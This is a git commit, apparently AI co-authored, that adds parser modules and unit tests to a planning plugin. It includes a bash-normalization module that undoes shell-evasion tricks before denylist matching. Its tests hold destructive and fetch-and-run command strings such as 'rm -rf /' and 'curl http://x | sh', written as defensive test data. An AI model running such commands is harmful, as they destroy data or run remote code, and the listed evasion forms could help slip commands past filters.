feat(ultraplan-local): Spor 1 wave 1 — lib/parsers + 66 tests grønn

7 nye moduler:
- lib/util/result.mjs — Result-shape m/ ok/fail/combine helpers
- lib/util/frontmatter.mjs — håndruller YAML-frontmatter-parser (subset, zero deps)
- lib/parsers/plan-schema.mjs — v1.7 step-regex + forbidden-heading-deteksjon (Fase/Phase/Stage/Steg)
- lib/parsers/manifest-yaml.mjs — per-step Manifest YAML-ekstraksjon m/ regex-validering
- lib/parsers/project-discovery.mjs — finn brief/research/architecture/plan/progress i prosjektmappe
- lib/parsers/arg-parser.mjs — $ARGUMENTS for alle 4 commands m/ flag-schema
- lib/parsers/bash-normalize.mjs — løftet fra hooks/scripts/pre-bash-executor.mjs

6 test-filer (66 tester totalt) — alle grønn:
- frontmatter (CRLF/BOM, scalars, lister, indent-rejection)
- plan-schema (positive Step-form, negative Fase/Phase/Stage/Steg, numbering, slicing)
- manifest-yaml (extraction, parsing, regex-validering, missing-key detection)
- project-discovery (sortert research, architecture-detection, phase-requirements)
- arg-parser (boolean/valued/multi-value flags, kvotert positional, ukjente flag)
- bash-normalize (\${x}/\\\\evasion, ANSI-stripping, full canonicalize-pipeline)

Forbereder Wave 2 (validators) og Spor 1-wiring inn i commands.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
This commit is contained in:
Kjell Tore Guttormsen 2026-05-01 05:35:28 +02:00
commit 205cdbf77f
13 changed files with 1224 additions and 0 deletions

View file

@ -0,0 +1,117 @@
// lib/parsers/arg-parser.mjs
// Parse $ARGUMENTS strings for the four ultra commands.
//
// Each command has its own valid-flag set; passing flags from another command
// produces an `unknown_flags` array but does not error — the caller decides.
// Per-command valid-flag schema used by parseArgs():
//   boolean — presence flags, stored as `true` when seen
//   valued  — flags that consume exactly one following token as their value
//   multi   — (optional) flags that consume every token up to the next `--flag`
//   aliases — reserved for future short-form mappings (currently all empty)
const FLAG_SCHEMA = {
  ultrabrief: {
    boolean: ['--quick', '--fg'],
    valued: [],
    aliases: {},
  },
  ultraresearch: {
    boolean: ['--quick', '--local', '--external', '--fg'],
    valued: ['--project'],
    aliases: {},
  },
  ultraplan: {
    boolean: ['--quick', '--fg'],
    valued: ['--project', '--brief', '--export', '--decompose'],
    // --research accepts a variable-length list of research files.
    multi: ['--research'],
    aliases: {},
  },
  ultraexecute: {
    boolean: ['--resume', '--dry-run', '--validate', '--fg'],
    valued: ['--project', '--step', '--session'],
    aliases: {},
  },
};
/**
 * Parse a raw $ARGUMENTS string against one command's flag schema.
 * Unknown flags are collected rather than treated as errors (the caller
 * decides); a flag that is missing its value yields ARG_MISSING_VALUE and an
 * unrecognized command yields ARG_UNKNOWN_COMMAND.
 * @param {string} argString Raw $ARGUMENTS as the command sees it.
 * @param {keyof FLAG_SCHEMA} command
 * @returns {{
 *   command: string,
 *   flags: Record<string, true | string | string[]>,
 *   positional: string[],
 *   unknown: string[],
 *   errors: Array<{code: string, message: string}>,
 * }}
 */
export function parseArgs(argString, command) {
  const schema = FLAG_SCHEMA[command];
  if (!schema) {
    return {
      command,
      flags: {},
      positional: [],
      unknown: [],
      errors: [{ code: 'ARG_UNKNOWN_COMMAND', message: `Unknown command: ${command}` }],
    };
  }

  const tokens = tokenize(argString);
  const flags = {};
  const positional = [];
  const unknown = [];
  const errors = [];

  let idx = 0;
  while (idx < tokens.length) {
    const token = tokens[idx];
    idx += 1;

    // Anything not shaped like a flag is a positional argument.
    if (!token.startsWith('--')) {
      positional.push(token);
      continue;
    }
    if (schema.boolean.includes(token)) {
      flags[token] = true;
      continue;
    }
    if (schema.valued.includes(token)) {
      const value = tokens[idx];
      if (value === undefined || value.startsWith('--')) {
        errors.push({ code: 'ARG_MISSING_VALUE', message: `Flag ${token} requires a value` });
      } else {
        flags[token] = value;
        idx += 1;
      }
      continue;
    }
    if (schema.multi?.includes(token)) {
      // Greedily collect values until the next flag-like token.
      const values = [];
      while (idx < tokens.length && !tokens[idx].startsWith('--')) {
        values.push(tokens[idx]);
        idx += 1;
      }
      if (values.length === 0) {
        errors.push({ code: 'ARG_MISSING_VALUE', message: `Flag ${token} requires at least one value` });
      } else {
        flags[token] = values;
      }
      continue;
    }
    unknown.push(token);
  }

  return { command, flags, positional, unknown, errors };
}
// Split an argument string into tokens, honoring "double" and 'single' quoted
// spans (quotes are removed; the quoted text becomes one token).
function tokenize(s) {
  if (typeof s !== 'string') return [];
  const src = s.trim();
  if (src === '') return [];

  const tokens = [];
  for (const match of src.matchAll(/"([^"]*)"|'([^']*)'|(\S+)/g)) {
    const [, doubleQuoted, singleQuoted, bare] = match;
    // An empty quoted string ('' or "") is still a deliberate token.
    if (doubleQuoted !== undefined) tokens.push(doubleQuoted);
    else if (singleQuoted !== undefined) tokens.push(singleQuoted);
    else tokens.push(bare);
  }
  return tokens;
}
export { FLAG_SCHEMA };

View file

@ -0,0 +1,48 @@
// lib/parsers/bash-normalize.mjs
// Bash-evasion normalization, lifted from hooks/scripts/pre-bash-executor.mjs.
//
// Source: ../../hooks/scripts/pre-bash-executor.mjs (lines 22-45) — verbatim
// extraction so the runtime hook and the test suite share one implementation.
// The hook still inlines a copy because it cannot import from outside the
// plugin distribution at this time; both copies must stay in sync.
/**
 * Strip bash evasion techniques: empty quotes, ${} expansion, backslash splitting.
 * Used to canonicalize a command before running denylist regex over it.
 * @param {string} cmd Raw command line; non-strings yield ''.
 * @returns {string} Command with evasion constructs removed.
 */
export function normalizeBashExpansion(cmd) {
  if (typeof cmd !== 'string' || cmd === '') return '';

  let out = cmd
    .replace(/''/g, '')           // w''get  -> wget
    .replace(/""/g, '')           // r""m    -> rm
    .replace(/\$\{(\w)\}/g, '$1') // c${u}rl -> curl (single-char expansion)
    .replace(/\$\{[^}]*\}/g, '')  // any other ${...} removed outright
    .replace(/`\s*`/g, '');       // empty backtick subshells

  // Collapse word\word splitting until stable: c\u\r\l needs several passes.
  for (;;) {
    const collapsed = out.replace(/(\w)\\(\w)/g, '$1$2');
    if (collapsed === out) return out;
    out = collapsed;
  }
}

/**
 * Strip ANSI SGR escape codes and collapse whitespace runs to single spaces.
 * @param {string} cmd
 * @returns {string}
 */
export function normalizeCommand(cmd) {
  if (typeof cmd !== 'string') return '';
  const plain = cmd.replace(/\x1B\[[0-9;]*m/g, '');
  return plain.split(/\s+/).filter(Boolean).join(' ');
}

/**
 * Full canonicalization pipeline used by hooks before pattern matching.
 * @param {string} cmd
 * @returns {string}
 */
export function canonicalize(cmd) {
  const expanded = normalizeBashExpansion(cmd);
  return normalizeCommand(expanded);
}

View file

@ -0,0 +1,118 @@
// lib/parsers/manifest-yaml.mjs
// Extract the `manifest:` YAML block from each step body.
//
// Plan v1.7 contract: every step has a fenced ```yaml ... ``` block whose
// top-level key is `manifest:` and which contains the keys:
// expected_paths, min_file_count, commit_message_pattern, bash_syntax_check,
// forbidden_paths, must_contain.
import { issue, ok, fail } from '../util/result.mjs';
import { parseFrontmatter } from '../util/frontmatter.mjs';
// Fenced ```yaml blocks (```yml also accepted). Stateful /g regex — do not
// exec() it directly without resetting lastIndex; matchAll leaves it untouched.
const FENCED_YAML_RE = /```ya?ml\s*\n([\s\S]*?)\n[ \t]*```/g;
const REQUIRED_KEYS = [
  'expected_paths',
  'min_file_count',
  'commit_message_pattern',
  'bash_syntax_check',
  'forbidden_paths',
  'must_contain',
];

/**
 * Extract the first fenced YAML block whose first non-blank line begins with
 * `manifest:`.
 * @param {string} stepBody Markdown body of one plan step.
 * @returns {string|null} Inner YAML body without the leading `manifest:` line.
 */
export function extractManifestYaml(stepBody) {
  if (typeof stepBody !== 'string') return null;
  for (const match of stepBody.matchAll(FENCED_YAML_RE)) {
    const inner = match[1];
    const lead = inner.split(/\r?\n/).find((line) => line.trim() !== '');
    if (lead !== undefined && /^manifest\s*:/.test(lead.trim())) {
      // Drop everything up to and including the `manifest:` line itself.
      return inner.replace(/^[\s\S]*?manifest[ \t]*:[ \t]*\n?/, '');
    }
  }
  return null;
}
/**
 * Parse a single step's manifest into an object.
 * Reuses the frontmatter parser (same restricted YAML subset) after dedenting,
 * since the YAML under `manifest:` is indented one level.
 * @param {string} stepBody Markdown body of one plan step.
 * @returns {import('../util/result.mjs').Result} parsed holds the manifest
 *   object (possibly partial when invalid).
 */
export function parseManifest(stepBody) {
  const yamlText = extractManifestYaml(stepBody);
  if (yamlText === null) {
    return fail(issue('MANIFEST_MISSING', 'No `manifest:` YAML block found in step body'));
  }
  // parseFrontmatter rejects indentation by design, so strip the common indent.
  const dedented = dedent(yamlText);
  const result = parseFrontmatter(dedented);
  if (!result.valid) return result; // propagate YAML-level errors unchanged
  const errors = [];
  const warnings = [];
  const parsed = result.parsed || {};
  // Contract: all six manifest keys must be present.
  for (const k of REQUIRED_KEYS) {
    if (!(k in parsed)) {
      errors.push(issue('MANIFEST_MISSING_KEY', `Manifest is missing required key: ${k}`));
    }
  }
  // commit_message_pattern must compile as a JS regex; catch bad patterns now
  // rather than at execution time.
  if ('commit_message_pattern' in parsed) {
    const pat = parsed.commit_message_pattern;
    if (typeof pat !== 'string') {
      errors.push(issue('MANIFEST_PATTERN_TYPE', 'commit_message_pattern must be a string'));
    } else {
      try { new RegExp(pat); }
      catch (e) {
        errors.push(issue('MANIFEST_PATTERN_INVALID', `commit_message_pattern is not a valid regex: ${e.message}`));
      }
    }
  }
  // Shallow type checks for the keys downstream validators consume directly.
  if ('expected_paths' in parsed && !Array.isArray(parsed.expected_paths)) {
    errors.push(issue('MANIFEST_PATHS_TYPE', 'expected_paths must be a list'));
  }
  if ('min_file_count' in parsed && typeof parsed.min_file_count !== 'number') {
    errors.push(issue('MANIFEST_COUNT_TYPE', 'min_file_count must be a number'));
  }
  return { valid: errors.length === 0, errors, warnings, parsed };
}
// Remove the common leading-whitespace width from every non-blank line.
// Note: rejoining with '\n' normalizes CRLF input to LF, matching the
// line-splitting done by the frontmatter parser downstream.
function dedent(text) {
  const rows = text.split(/\r?\n/);
  const widths = [];
  for (const row of rows) {
    if (row.trim() === '') continue;
    widths.push(row.length - row.trimStart().length);
  }
  if (widths.length === 0) return text;
  const common = Math.min(...widths);
  if (common === 0) return text;
  return rows.map((row) => row.slice(common)).join('\n');
}
/**
 * Validate that every step in a parsed plan has a valid manifest.
 * Per-step issues are re-wrapped with a `Step N:` prefix so callers can report
 * them against the plan as a whole.
 * @param {Array<{n: number, body: string}>} steps Output of sliceSteps().
 * @returns {import('../util/result.mjs').Result} parsed is a per-step array of
 *   { n, manifest, valid }.
 */
export function validateAllManifests(steps) {
  // Consistent with the sibling parsers (findSteps, extractManifestYaml):
  // malformed input degrades to a failed Result instead of throwing.
  if (!Array.isArray(steps)) {
    return fail(issue('MANIFEST_INPUT', 'steps must be an array'));
  }
  const errors = [];
  const warnings = [];
  const parsed = [];
  for (const s of steps) {
    const r = parseManifest(s.body);
    if (!r.valid) {
      // Preserve hint AND location (location was previously dropped).
      for (const e of r.errors) errors.push(issue(e.code, `Step ${s.n}: ${e.message}`, e.hint, e.location));
    }
    // Previously per-step warnings were silently discarded; propagate them.
    for (const w of r.warnings || []) {
      warnings.push(issue(w.code, `Step ${s.n}: ${w.message}`, w.hint, w.location));
    }
    parsed.push({ n: s.n, manifest: r.parsed, valid: r.valid });
  }
  return { valid: errors.length === 0, errors, warnings, parsed };
}

View file

@ -0,0 +1,126 @@
// lib/parsers/plan-schema.mjs
// Plan v1.7 schema parser — heading shape detection.
//
// The canonical step heading is `### Step N: <title>` (literal colon-space).
// Forbidden narrative drift formats (introduced in v1.8.0 to defend against
// Opus 4.7 schema-drift): `## Fase N`, `### Phase N`, `### Stage N`, `### Steg N`.
//
// This module extracts step boundaries; per-step body parsing lives elsewhere.
import { ok, fail, issue } from '../util/result.mjs';
// Canonical step heading matchers: `### Step N: <title>` (single + global).
// NOTE: the /g//gm regexes are stateful; use matchAll (which copies them) or
// reset lastIndex before exec-style use.
export const STEP_HEADING_REGEX = /^### Step (\d+):\s+(.+?)\s*$/m;
export const STEP_HEADING_GLOBAL = /^### Step (\d+):\s+(.+?)\s*$/gm;
// Narrative-drift heading forms rejected by the v1.7 schema.
export const FORBIDDEN_HEADING_REGEX = /^(?:##|###) (?:Fase|Phase|Stage|Steg) \d+/m;
export const FORBIDDEN_HEADING_GLOBAL = /^(?:##|###) (?:Fase|Phase|Stage|Steg) \d+/gm;
// `plan_version: X.Y` with optional quotes, in frontmatter or body.
export const PLAN_VERSION_REGEX = /^plan_version:\s*['"]?([\d.]+)['"]?/m;

/**
 * Find all step heading positions in plan text.
 * @param {string} text Full plan markdown; non-strings yield [].
 * @returns {Array<{n: number, title: string, line: number, offset: number}>}
 *   line is 1-based; offset is a character index into text.
 */
export function findSteps(text) {
  if (typeof text !== 'string') return [];
  const headings = [];
  for (const match of text.matchAll(STEP_HEADING_GLOBAL)) {
    const offset = match.index;
    const line = text.slice(0, offset).split(/\r?\n/).length;
    headings.push({
      n: Number.parseInt(match[1], 10),
      title: match[2].trim(),
      line,
      offset,
    });
  }
  return headings;
}
/**
 * Find forbidden narrative-drift heading occurrences (Fase/Phase/Stage/Steg N).
 * @param {string} text Full plan markdown; non-strings yield [].
 * @returns {Array<{form: string, line: number, offset: number, raw: string}>}
 *   `form` and `raw` both carry the matched heading text.
 */
export function findForbiddenHeadings(text) {
  if (typeof text !== 'string') return [];
  const hits = [];
  for (const match of text.matchAll(FORBIDDEN_HEADING_GLOBAL)) {
    const raw = match[0];
    const offset = match.index;
    const line = text.slice(0, offset).split(/\r?\n/).length;
    hits.push({ form: raw, line, offset, raw });
  }
  return hits;
}
/**
 * Slice plan text into per-step sections; each body runs from its own heading
 * up to the next heading (or the end of the text for the final step).
 * @param {string} text Full plan markdown.
 * @returns {Array<{n: number, title: string, body: string, line: number}>}
 */
export function sliceSteps(text) {
  const headings = findSteps(text);
  return headings.map((head, idx) => {
    const next = headings[idx + 1];
    return {
      n: head.n,
      title: head.title,
      body: text.slice(head.offset, next ? next.offset : text.length),
      line: head.line,
    };
  });
}
/**
 * Extract `plan_version: X.Y` from frontmatter or doc body.
 * @param {string} text
 * @returns {string|null} The version string without quotes, or null if absent.
 */
export function extractPlanVersion(text) {
  if (typeof text !== 'string') return null;
  const match = text.match(PLAN_VERSION_REGEX);
  return match ? match[1] : null;
}
/**
 * Validate plan structure at the heading level.
 * In strict mode (the default) any forbidden narrative-drift heading is an
 * error; in soft mode it is demoted to a warning. Step numbers must be 1..N
 * contiguous and ordered.
 * @param {string} text Full plan markdown.
 * @param {{strict?: boolean}} [opts]
 * @returns {import('../util/result.mjs').Result} parsed = { steps, forbidden }.
 */
export function validatePlanHeadings(text, opts = {}) {
  const strict = opts.strict !== false;
  if (typeof text !== 'string') {
    return fail(issue('PLAN_INPUT', 'Plan text is not a string'));
  }

  const errors = [];
  const warnings = [];

  const forbidden = findForbiddenHeadings(text);
  if (forbidden.length > 0) {
    const where = forbidden.map((f) => `line ${f.line}: ${f.raw}`).join('; ');
    const drift = issue(
      'PLAN_FORBIDDEN_HEADING',
      `Found ${forbidden.length} forbidden narrative-drift heading(s): ${where}`,
      'Use canonical "### Step N: <title>". Forbidden forms: Fase/Phase/Stage/Steg.',
    );
    (strict ? errors : warnings).push(drift);
  }

  const steps = findSteps(text);
  if (steps.length === 0) {
    errors.push(issue('PLAN_NO_STEPS', 'No step headings found', 'Expected at least one "### Step 1: <title>".'));
  } else {
    // Report only the first break in the 1..N sequence.
    const brokenAt = steps.findIndex((step, idx) => step.n !== idx + 1);
    if (brokenAt !== -1) {
      errors.push(issue(
        'PLAN_STEP_NUMBERING',
        `Step numbering breaks at position ${brokenAt + 1} (got Step ${steps[brokenAt].n})`,
        'Steps must be 1..N contiguous and ordered.',
      ));
    }
  }

  return { valid: errors.length === 0, errors, warnings, parsed: { steps, forbidden } };
}

View file

@ -0,0 +1,89 @@
// lib/parsers/project-discovery.mjs
// Discover ultra-suite artifacts inside a project directory.
//
// Layout (post-v3.0.0 project-directory contract):
// .claude/projects/<YYYY-MM-DD>-<slug>/
// brief.md
// research/<NN>-<slug>.md (sorted by filename)
// architecture/overview.md (opt-in, owned by separate ultra-cc-architect plugin)
// plan.md
// progress.json
import { existsSync, readdirSync, statSync } from 'node:fs';
import { join } from 'node:path';
/**
 * @typedef {{
 *   projectDir: string,
 *   brief: string|null,
 *   research: string[],
 *   architecture: { overview: string|null, gaps: string|null, looseFiles: string[] },
 *   plan: string|null,
 *   progress: string|null,
 * }} ProjectArtifacts
 */

/**
 * Discover ultra-suite artifacts inside a project directory.
 * A missing/non-directory projectDir yields the empty artifact set rather
 * than throwing, so callers can report "nothing found" uniformly.
 * @param {string} projectDir Project directory path.
 * @returns {ProjectArtifacts}
 */
export function discoverProject(projectDir) {
  // Return the path when it exists and is a regular file, else null.
  const fileOrNull = (p) => (existsSync(p) && statSync(p).isFile() ? p : null);
  const isDir = (p) => existsSync(p) && statSync(p).isDirectory();

  const out = {
    projectDir,
    brief: null,
    research: [],
    architecture: { overview: null, gaps: null, looseFiles: [] },
    plan: null,
    progress: null,
  };
  if (!projectDir || !isDir(projectDir)) {
    return out;
  }

  out.brief = fileOrNull(join(projectDir, 'brief.md'));
  out.plan = fileOrNull(join(projectDir, 'plan.md'));
  out.progress = fileOrNull(join(projectDir, 'progress.json'));

  const researchDir = join(projectDir, 'research');
  if (isDir(researchDir)) {
    // Sorted by filename: the NN- prefix gives a stable reading order.
    out.research = readdirSync(researchDir)
      .filter((f) => f.endsWith('.md'))
      .sort()
      .map((f) => join(researchDir, f));
  }

  const archDir = join(projectDir, 'architecture');
  if (isDir(archDir)) {
    // Fix: overview/gaps now require isFile(), consistent with brief/plan/
    // progress (previously a *directory* named overview.md was reported).
    out.architecture.overview = fileOrNull(join(archDir, 'overview.md'));
    out.architecture.gaps = fileOrNull(join(archDir, 'gaps.md'));
    out.architecture.looseFiles = readdirSync(archDir)
      .filter((f) => f.endsWith('.md') && f !== 'overview.md' && f !== 'gaps.md')
      .map((f) => join(archDir, f));
  }
  return out;
}
/**
 * Validate that the artifact set is consistent for a given pipeline phase.
 * research/plan require brief.md; execute requires plan.md; brief needs nothing.
 * @param {ProjectArtifacts} artifacts Output of discoverProject().
 * @param {'brief'|'research'|'plan'|'execute'} phase
 * @returns {{valid: boolean, errors: Array<{code: string, message: string}>, warnings: [], parsed: ProjectArtifacts}}
 */
export function checkPhaseRequirements(artifacts, phase) {
  const errors = [];
  if ((phase === 'research' || phase === 'plan') && !artifacts.brief) {
    errors.push({ code: 'PROJECT_NO_BRIEF', message: `${phase} phase requires brief.md` });
  }
  if (phase === 'execute' && !artifacts.plan) {
    errors.push({ code: 'PROJECT_NO_PLAN', message: 'execute phase requires plan.md' });
  }
  return { valid: errors.length === 0, errors, warnings: [], parsed: artifacts };
}

View file

@ -0,0 +1,138 @@
// lib/util/frontmatter.mjs
// Hand-rolled YAML-frontmatter parser.
//
// Supported subset:
// - String scalars (quoted or unquoted)
// - Numbers (integer + float)
// - Booleans (true / false)
// - null
// - Single-level dicts
// - Lists of scalars (- value)
//
// Deliberately rejects: nested dicts in lists, multi-line strings,
// anchors/aliases, tags, flow style ({...} / [...]).
//
// Why no js-yaml: zero-deps invariant. Templates emit only this subset.
import { issue, ok, fail } from './result.mjs';
// Frontmatter shape: opening `---` line, YAML body, closing `---`, optional
// markdown body. An optional UTF-8 BOM may precede the whole document.
// (The previous revision had lost the \uFEFF character here, leaving the
// invalid pattern /^?---/ — a SyntaxError that crashed the module at load —
// and a no-op BOM strip below.)
const FRONTMATTER_RE = /^\uFEFF?---\r?\n([\s\S]*?)\r?\n---(?:\r?\n([\s\S]*))?$/;

/**
 * Split raw markdown into { frontmatter, body }.
 * Strips a leading UTF-8 BOM and tolerates CRLF line endings.
 * Returns { hasFrontmatter: false } when no leading --- block exists.
 * @param {string} text Full markdown document.
 */
export function splitFrontmatter(text) {
  if (typeof text !== 'string') return { hasFrontmatter: false, body: '' };
  // Strip the BOM up front so the delimiter match and the returned body agree.
  const stripped = text.replace(/^\uFEFF/, '');
  const m = stripped.match(/^---\r?\n([\s\S]*?)\r?\n---(?:\r?\n([\s\S]*))?$/);
  if (!m) return { hasFrontmatter: false, body: stripped };
  return {
    hasFrontmatter: true,
    frontmatter: m[1],
    body: m[2] || '',
  };
}
/**
 * Parse a YAML-frontmatter string into a JS object.
 * Supports only the restricted subset documented in the module header:
 * top-level scalar keys and lists of scalars. Indented (nested) keys produce
 * FM_INDENT; unparseable lines produce FM_SYNTAX. Parsing continues past
 * errors so every issue is reported in one pass.
 * @param {string} yamlText Raw text between the --- delimiters.
 * @returns {import('./result.mjs').Result}
 */
export function parseFrontmatter(yamlText) {
  if (typeof yamlText !== 'string') {
    return fail(issue('FM_INPUT', 'Frontmatter input is not a string'));
  }
  const lines = yamlText.split(/\r?\n/);
  const out = {};
  const errors = [];
  let i = 0;
  while (i < lines.length) {
    const line = lines[i];
    // Skip blank lines and full-line comments.
    if (line.trim() === '' || line.trimStart().startsWith('#')) {
      i++;
      continue;
    }
    const indentMatch = line.match(/^(\s*)/);
    const indent = indentMatch ? indentMatch[0].length : 0;
    if (indent > 0) {
      // Nested dicts are deliberately unsupported (zero-deps subset parser).
      errors.push(issue('FM_INDENT', `Unexpected indentation at line ${i + 1}`, 'Top-level keys only; nested dicts unsupported.'));
      i++;
      continue;
    }
    const kv = line.match(/^([A-Za-z_][A-Za-z0-9_-]*)\s*:\s*(.*)$/);
    if (!kv) {
      errors.push(issue('FM_SYNTAX', `Cannot parse line ${i + 1}: ${line}`));
      i++;
      continue;
    }
    const key = kv[1];
    const rest = kv[2];
    if (rest === '' || rest === undefined) {
      // Bare `key:` — look ahead for an indented `- item` list; otherwise null.
      const list = [];
      let j = i + 1;
      while (j < lines.length) {
        const next = lines[j];
        if (next.trim() === '') { j++; continue; } // blank lines inside a list are allowed
        const m2 = next.match(/^\s+-\s+(.*)$/);
        if (!m2) break;
        list.push(parseScalar(m2[1]));
        j++;
      }
      if (list.length > 0) {
        out[key] = list;
        i = j; // consume the list lines
      } else {
        out[key] = null;
        i++;
      }
      continue;
    }
    out[key] = parseScalar(rest);
    i++;
  }
  // Partial output is still returned on failure so callers can inspect it.
  if (errors.length > 0) return { valid: false, errors, warnings: [], parsed: out };
  return ok(out);
}
// Convert one YAML scalar token to its JS value: null/bool/number/[] and {}
// literals, quoted strings (double quotes honor \n \t \r escapes), and
// everything else as a plain string.
function parseScalar(raw) {
  const value = raw.trim();
  switch (value) {
    case '': return '';
    case 'null':
    case '~': return null;
    case 'true': return true;
    case 'false': return false;
    case '[]': return [];
    case '{}': return {};
    default: break;
  }
  if (/^-?\d+$/.test(value)) return Number.parseInt(value, 10);
  if (/^-?\d+\.\d+$/.test(value)) return Number.parseFloat(value);

  if (value.startsWith('"') && value.endsWith('"')) {
    const inner = value.slice(1, -1);
    // Minimal escape handling; unknown escapes collapse to the escaped char.
    return inner.replace(/\\(.)/g, (_, esc) => {
      switch (esc) {
        case 'n': return '\n';
        case 't': return '\t';
        case 'r': return '\r';
        default: return esc;
      }
    });
  }
  if (value.startsWith("'") && value.endsWith("'")) return value.slice(1, -1);
  return value;
}
/**
 * Parse a markdown file's frontmatter directly from its full text.
 * On success, parsed = { frontmatter: <object>, body: <markdown string> }.
 * @param {string} text Full markdown document.
 * @returns {import('./result.mjs').Result}
 */
export function parseDocument(text) {
  const pieces = splitFrontmatter(text);
  if (!pieces.hasFrontmatter) {
    return fail(issue('FM_MISSING', 'No frontmatter block found'));
  }
  const fm = parseFrontmatter(pieces.frontmatter);
  // Keep valid/errors/warnings from the YAML parse; re-shape parsed to carry
  // both the frontmatter object and the document body.
  return { ...fm, parsed: { frontmatter: fm.parsed, body: pieces.body } };
}

View file

@ -0,0 +1,35 @@
// lib/util/result.mjs
// Validation result shape used by every validator and parser.
/**
 * @typedef {{ code: string, message: string, hint?: string, location?: string }} Issue
 * @typedef {{ valid: boolean, errors: Issue[], warnings: Issue[], parsed?: any }} Result
 */

/**
 * Build a successful Result with no errors or warnings.
 * @param {any} [parsed] Parse output to attach.
 * @returns {Result}
 */
export function ok(parsed) {
  return { valid: true, errors: [], warnings: [], parsed };
}
/**
 * Build a failed Result.
 * @param {Issue|Issue[]} errors A single issue or a list; a lone issue is wrapped in an array.
 * @param {any} [parsed] Optional partial parse output to carry with the failure.
 * @returns {Result}
 */
export function fail(errors, parsed) {
  return { valid: false, errors: Array.isArray(errors) ? errors : [errors], warnings: [], parsed };
}
/**
 * Merge several Results: errors and warnings are concatenated in order, the
 * first defined `parsed` wins, and the merge is valid only when no error
 * survived.
 * @param {Result[]} results
 * @returns {Result}
 */
export function combine(results) {
  const errors = [];
  const warnings = [];
  let parsed;
  for (const result of results) {
    const { errors: errs, warnings: warns, parsed: payload } = result;
    if (errs) errors.push(...errs);
    if (warns) warnings.push(...warns);
    if (payload !== undefined && parsed === undefined) parsed = payload;
  }
  return { valid: errors.length === 0, errors, warnings, parsed };
}
/**
 * Build a single Issue record.
 * @param {string} code Stable machine-readable code (e.g. 'PLAN_NO_STEPS').
 * @param {string} message Human-readable description.
 * @param {string} [hint] Optional remediation hint.
 * @param {string} [location] Optional source location.
 * @returns {Issue}
 */
export function issue(code, message, hint, location) {
  const record = { code, message };
  record.hint = hint;
  record.location = location;
  return record;
}

View file

@ -0,0 +1,77 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import { parseArgs } from '../../lib/parsers/arg-parser.mjs';
// Unit tests for lib/parsers/arg-parser.mjs — boolean/valued/multi flag
// handling per command, quoted positionals, unknown flags, and the
// unknown-command error path.

test('ultrabrief — empty args', () => {
  const r = parseArgs('', 'ultrabrief');
  assert.equal(r.command, 'ultrabrief');
  assert.deepEqual(r.flags, {});
});
test('ultrabrief — --quick boolean', () => {
  const r = parseArgs('--quick', 'ultrabrief');
  assert.equal(r.flags['--quick'], true);
});
test('ultraresearch — --project value capture', () => {
  const r = parseArgs('--project .claude/projects/2026-04-30-foo', 'ultraresearch');
  assert.equal(r.flags['--project'], '.claude/projects/2026-04-30-foo');
});
test('ultraresearch — --quick --local combined', () => {
  const r = parseArgs('--quick --local', 'ultraresearch');
  assert.equal(r.flags['--quick'], true);
  assert.equal(r.flags['--local'], true);
});
test('ultraplan — --research multi-value', () => {
  const r = parseArgs('--research a.md b.md c.md', 'ultraplan');
  assert.deepEqual(r.flags['--research'], ['a.md', 'b.md', 'c.md']);
});
test('ultraplan — --research multi stops at next flag', () => {
  const r = parseArgs('--research a.md b.md --project /x', 'ultraplan');
  assert.deepEqual(r.flags['--research'], ['a.md', 'b.md']);
  assert.equal(r.flags['--project'], '/x');
});
test('ultraplan — --brief required-value flag', () => {
  const r = parseArgs('--brief brief.md', 'ultraplan');
  assert.equal(r.flags['--brief'], 'brief.md');
});
test('ultraplan — missing value for --brief produces error', () => {
  // A following `--flag` token must not be consumed as the value.
  const r = parseArgs('--brief --quick', 'ultraplan');
  assert.ok(r.errors.find(e => e.code === 'ARG_MISSING_VALUE'));
});
test('ultraplan — --decompose value flag', () => {
  const r = parseArgs('--decompose plan.md', 'ultraplan');
  assert.equal(r.flags['--decompose'], 'plan.md');
});
test('ultraexecute — --resume + --project', () => {
  const r = parseArgs('--resume --project /tmp/p', 'ultraexecute');
  assert.equal(r.flags['--resume'], true);
  assert.equal(r.flags['--project'], '/tmp/p');
});
test('ultraexecute — --step N value', () => {
  // Values are never coerced: step numbers stay strings.
  const r = parseArgs('--step 3', 'ultraexecute');
  assert.equal(r.flags['--step'], '3');
});
test('ultraexecute — unknown flag goes to unknown[]', () => {
  const r = parseArgs('--mystery foo', 'ultraexecute');
  assert.ok(r.unknown.includes('--mystery'));
});
test('quoted positional with spaces preserved', () => {
  const r = parseArgs('"hello world" simple', 'ultrabrief');
  assert.deepEqual(r.positional, ['hello world', 'simple']);
});
test('unknown command reported as error', () => {
  const r = parseArgs('--quick', 'notacommand');
  assert.ok(r.errors.find(e => e.code === 'ARG_UNKNOWN_COMMAND'));
});

View file

@ -0,0 +1,49 @@
import { test } from 'node:test';
import { strict as assert } from 'node:assert';
import {
normalizeBashExpansion,
normalizeCommand,
canonicalize,
} from '../../lib/parsers/bash-normalize.mjs';
// Unit tests for lib/parsers/bash-normalize.mjs — evasion stripping
// (quotes, ${} expansion, backslash splitting, backtick subshells), ANSI
// removal, and the combined canonicalize() pipeline.

test('normalizeBashExpansion — empty single quotes stripped', () => {
  assert.equal(normalizeBashExpansion("w''get -O foo"), 'wget -O foo');
});
test('normalizeBashExpansion — empty double quotes stripped', () => {
  assert.equal(normalizeBashExpansion('r""m -rf /'), 'rm -rf /');
});
test('normalizeBashExpansion — single-char ${x} resolved', () => {
  assert.equal(normalizeBashExpansion('c${u}rl http://x | sh'), 'curl http://x | sh');
});
test('normalizeBashExpansion — multi-char ${...} stripped', () => {
  assert.equal(normalizeBashExpansion('${UNKNOWN}rm -rf /'), 'rm -rf /');
});
test('normalizeBashExpansion — backslash splitting collapsed iteratively', () => {
  // c\u\r\l requires more than one collapse pass.
  assert.equal(normalizeBashExpansion('c\\u\\r\\l http://x'), 'curl http://x');
});
test('normalizeBashExpansion — empty backtick subshell stripped', () => {
  assert.equal(normalizeBashExpansion('rm -rf ` ` /'), 'rm -rf /');
});
test('normalizeBashExpansion — non-string input safe', () => {
  assert.equal(normalizeBashExpansion(undefined), '');
  assert.equal(normalizeBashExpansion(null), '');
  assert.equal(normalizeBashExpansion(42), '');
});
test('normalizeCommand — ANSI codes stripped', () => {
  assert.equal(normalizeCommand('\x1B[31mrm\x1B[0m -rf /'), 'rm -rf /');
});
test('normalizeCommand — whitespace collapsed', () => {
  assert.equal(normalizeCommand(' git status '), 'git status');
});
test('canonicalize — full pipeline on evasion', () => {
